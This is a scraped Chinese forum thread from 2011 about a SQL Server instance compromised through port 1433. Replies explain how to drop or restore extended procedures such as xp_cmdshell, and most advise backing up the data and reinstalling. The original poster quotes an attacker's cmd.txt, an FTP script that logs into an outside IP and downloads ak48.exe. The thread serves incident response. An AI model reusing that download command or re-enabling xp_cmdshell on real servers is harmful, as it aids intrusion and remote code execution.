1433被入侵,高分求修复办法. 本帖最后由 zixing 于 2011-07-27 13:29:30 编辑 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 增加或利用一个windows系统帐户登录n,登录后进行修改sa密码等操作 c:\windows\system32下多了个cmd.txt内容为:open 114.80.78.181sql2012sql2012get ak48.exebye 系统存储过程被篡改?按楼主给的感觉大部分是扩展存储过程不知道楼主有没有使用过这些存储过程。对于 xp_cmdshell 去掉它可以:use master sp_dropextendedproc 'xp_cmdshell' 恢复可以:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' OLE自动存储过程:Sp_OACreate ;Sp_OADestroy ;Sp_OAGetErrorInfo ;Sp_OAGetProperty Sp_OAMethod ;Sp_OASetProperty ;Sp_OAStop 注册表访问的存储过程:Xp_regaddmultistring ;Xp_regdeletekey ;Xp_regdeletevalue ;Xp_regenumvalues Xp_regread ;Xp_regremovemultistring ;Xp_regwrite 恢复的话试试看:create procedure sp_addextendedproc @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO use master exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' exec sp_addextendedproc xp_dirtree,'xpstar.dll' exec sp_addextendedproc xp_enumgroups,'xplog70.dll' exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' exec sp_addextendedproc xp_loginconfig,'xplog70.dll' exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' exec sp_addextendedproc sp_OACreate,'odsole70.dll' exec sp_addextendedproc sp_OADestroy,'odsole70.dll' exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAMethod,'odsole70.dll' exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAStop,'odsole70.dll' exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' exec sp_addextendedproc xp_regread,'xpstar.dll' exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' exec sp_addextendedproc xp_regwrite,'xpstar.dll' exec sp_addextendedproc xp_availablemedia,'xpstar.dll'另外建立楼主增强下1433端口的保护,密码策略,账号策略,IP连接限制等都可以。 其实这种情况去尝试修复,还不如重装sql server更靠谱. 服务器: 消息 2714,级别 16,状态 7,过程 sp_addextendedproc,行 9数据库中已存在名为 'xp_cmdshell' 的对象。提示这错误.... 这样子,把所有库都完整备份下,然后重新装SQL看看吧!楼主看看1433端口防范入侵的资料,按实际情况设置下。 与其修复那些系统存储过程还不如搞个备份或者直接把数据库文件copy出来,再安装下sqlserver 这样比较好。 数据表字段内容合并 怎样处理后,才能按照一定的顺序排列 delete top (1) from table1为什么不好用呢? 导入数据时,如何新建唯一的序列号(源表excel文件没有每行的唯一编号?) 如何使用DTS将 SQL server 2000的 DB 移植到 Oracle 10g? 菜鸟请教一个问题 sql语句问题 求救!!!!!!! 求sql语句~~分组统计 结果集看不到?存储过程高人请看看 用了数据库复制后,服务器容易死机? SQL 对结果集排序
内容为:
open 114.80.78.181
sql2012
sql2012
get ak48.exe
bye
对于 xp_cmdshell 去掉它可以:
use master
sp_dropextendedproc 'xp_cmdshell' 恢复可以:
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' OLE自动存储过程:
Sp_OACreate ;Sp_OADestroy ;Sp_OAGetErrorInfo ;Sp_OAGetProperty
Sp_OAMethod ;Sp_OASetProperty ;Sp_OAStop
注册表访问的存储过程:
Xp_regaddmultistring ;Xp_regdeletekey ;Xp_regdeletevalue ;Xp_regenumvalues
Xp_regread ;Xp_regremovemultistring ;Xp_regwrite
恢复的话试试看:
create procedure sp_addextendedproc
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
另外建立楼主增强下1433端口的保护,密码策略,账号策略,IP连接限制等都可以。
数据库中已存在名为 'xp_cmdshell' 的对象。提示这错误....